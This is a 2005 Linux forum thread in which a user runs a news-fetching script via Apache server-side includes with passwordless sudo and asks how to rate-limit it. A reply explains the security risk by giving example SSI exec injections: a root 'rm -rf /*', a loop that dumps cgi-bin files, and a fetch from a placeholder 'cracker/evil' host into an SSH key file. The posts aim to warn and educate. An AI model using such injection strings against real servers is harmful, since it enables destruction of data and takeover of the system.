LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Newbie (https://www.linuxquestions.org/questions/linux-newbie-8/)
-   -   when using SSI, can I limit how often a command can be run? (https://www.linuxquestions.org/questions/linux-newbie-8/when-using-ssi-can-i-limit-how-often-a-command-can-be-run-296222/)

jeffreybluml 03-01-2005 06:15 AM

when using SSI, can I limit how often a command can be run?
 
For instance, I've got a little script that goes out and gets all my rss feeds, then parses them to display on my webpage. Rather than have cron go out and update these feeds every 10 minutes (I want to make sure they're always fresh, but this seems a bit much), I'm just using server side includes and have a link on my page that executes the script (via sudo, which I have configured to allow apache to run this command without password) so that I only have to update them when I'm actually reading them. This seems to be working really well, but it leaves the obvious ability for somebody viewing the webpage to click the link a million times and bog down (or crash) my PC.

To make sure I'm clear, here's the code on the webpage to issue the command...

Code:

<pre>
<!--#exec cmd="sudo getnews" -->
</pre>

So, get to the point, right? Is there a setting somewhere with which I can control how often this can be done? I've got the getnews "script" located in /bin and it's basically just a shell "script" (I use quotes cuz I'm no script writer...it's just a file that starts with #!/bin/bash and then just issues a bunch of calls to a perl script, so I call that a script). Can I either set a minimum time between allowed runs of this file in /bin, or is there some way I can set a minimum wait between times apache is allowed to use the sudo command (remember though, no password is set, so I can't just use the password expire) to issue this, which would essentially create the same effect?

Ugh, It's early so I hope I'm being clear....

Any ideas, thoughts, suggestions?

Thanks,

Jeff

gnube 03-01-2005 06:32 AM

You can look at the man page to wait or sleep and use that. Here is the first line of the man page from sleep;

The sleep utility suspends execution for a minimum of seconds. It is
usually used to schedule the execution of other commands (see EXAMPLES
below).

But, if you decide to stay with the current set up of your program, you are creating a real big security risk.

gnube 03-01-2005 06:35 AM

You can look at the man page to wait or sleep and use that. Here is the first line of the man page from sleep;

The sleep utility suspends execution for a minimum of seconds. It is
usually used to schedule the execution of other commands (see EXAMPLES
below).

But, if you decide to stay with the current set up of your program, you are creating a real big security risk. Allowing the server-side include #exec command allows all users to execute system commands directly in the server file system. So I can do this on your machine as root right now;

<!--#exec cmd="sudo rm -rf /*" -->

This would probably be the least of your problems. A rootkit will be installed faster than you can say debian. If you do not take security precautions people will abuse your box and the whole internet will laugh and point at you.

gnube

jeffreybluml 03-01-2005 06:39 AM

THanks for the reply. I'll check the man pages for those...

As for the security risk, I had read that. Let me just confirm that what I've done is sufficient....

I DO have a guestbook on the site (which is what helps create the risk due to the write access that this gives visitors, right?), but it has it's own subdirectory. I have set that directory in the httpd.conf file to NOT allow exec's. This works, right? I've also tried to confirm by adding a new guestbook entry, and adding this to it...

Code:

<pre>
<!--#exec cmd="whoami" -->
</pre>
<pre>
<!--#exec cmd="ls" -->
</pre>

Neither of these returned anything in the guestbook entry, so I figured it had worked. Sound right to you?

Are there other risks I need to konw about? I've tried to do my research, but let me know if I'm missing anything.

Thanks again!

gnube 03-01-2005 07:25 AM

The issue is not only creating a directory where the shtml file cannot execute commands, it is also who it runs as. Apache is usualy set to run as a non-root user. If you have changed /etc/sudo to allow it to execute commands as root, then it can do whatever it wants in the wrong hands. Someone could re-write the URL to include malicious code that Apache can execute as root! This is serious.

Did you try <!--#exec cmd="sudo ls"--> ?
Or <!--#exec cmd="for i in `ls /var/www/cgi-bin/`; do cat $i; done;-->
Or <!--#exec cmd="touch .ssh/indentity.pub"-->
<!--#exec cmd="cat http://cracker/evil > .ssh/indentity.pub"-->


I recommend not allowing Apache to be run as root and taking the apache user out of the sudoers file. If apache needs to get info from a remote site, why don't you script it with curl or wget? Then you can download it anywhere you want and the .shtml file can process it. Then you decrease your exposure and risk considerably.

Consider something like this;

small shell script
curl -o newsfile http://www.newssite.com/newsfile

shtml file
<!--#include virtual="newsfile"-->

jeffreybluml 03-01-2005 07:37 AM

I'm actually using wget already to get a couple of the feeds (for some reason my JSMFeed.pl script doesn' like a couple of them), but it too would start to bog my system down if the page were refreshed repeatedly....right? That is assuming you were suggesting adding the curl code right into the webpage....

I had set the sudoers file so that apache could run ONLY the /bin/getnews script, figured that would take care of the sudo security risk.

After all this talk I've gotten all security-nervous again, so I dumped the whole exec cmd thing and went back to having cron update the feeds every 10 minutes.

Then I just put a refresh link on the page, for those internet newbies who can't find the button....;-)

Oh well, twas a fun learning experience...

THanks for the replies...

gnube 03-01-2005 08:40 AM

Can't you update the feeds in the background with cron and wget, then refresh the web page? I think that would be the most efficient use of resources.

jeffreybluml 03-01-2005 09:05 AM

You're probably right. That was how I originally set it up, but then I decided that it was a waste to have the feeds updating when I'm not at the computer looking at them, so I put this in.

I'm starting to think I jsut did this for something to do, as the more I think about it the more silly this whole venture seems. But again, it was a fun little experiment and I learned something. I have resorted to my original setup, which really was the most logical. I have cron updating the feeds every 10 minutes (as well as a couple of weather radar images - more use for wget) and the frame on the webpage auto updates every 5.

Question regarding wget; Is there a way to COMPLETELY suppress ANY output from the command? I read through man and info, and I can get it to run "in the background" and all that, but it still produces and output message like "continuing in background...PID.....output will be written to wget-whatever.log" or whatever (which then gets mailed to me in /var/spool/mail), and then, of course, saves a log file. So, I've got cron deleting these log files periodically as well as my /var/spool/mail (seriously, cron is the coolest tool ever!), but is there any way to just stop them from being created?

Anyways, regardless of whether or not you can answer that, thanks for the insight here. I'm glad I was able to be persuaded back to keeping it simple....

Thanks,


All times are GMT -5. The time now is 05:11 PM.